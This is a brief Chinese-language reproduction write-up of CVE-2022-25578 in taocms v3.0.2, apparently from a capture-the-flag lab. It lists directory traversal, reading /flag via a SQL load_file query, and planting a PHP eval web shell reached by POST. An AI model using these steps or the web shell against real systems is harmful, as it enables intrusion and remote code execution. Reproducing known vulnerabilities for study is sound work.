CVE-2022-25578漏洞复现 #

taocms v3.0.2允许攻击者通过编辑.htaccess文件执行任意代码 该版本下存在三个漏洞， 第一个是直接在文件管理下进行目录翻越../../../ 第二个是在sql命令处输入select load_file('/flag') 第三个是更改php文件，使其包含shell：

<?php
	echo "hello shell";
	eval($_POST['cmd']);
 ?>

进入到该php文件，直接shell连接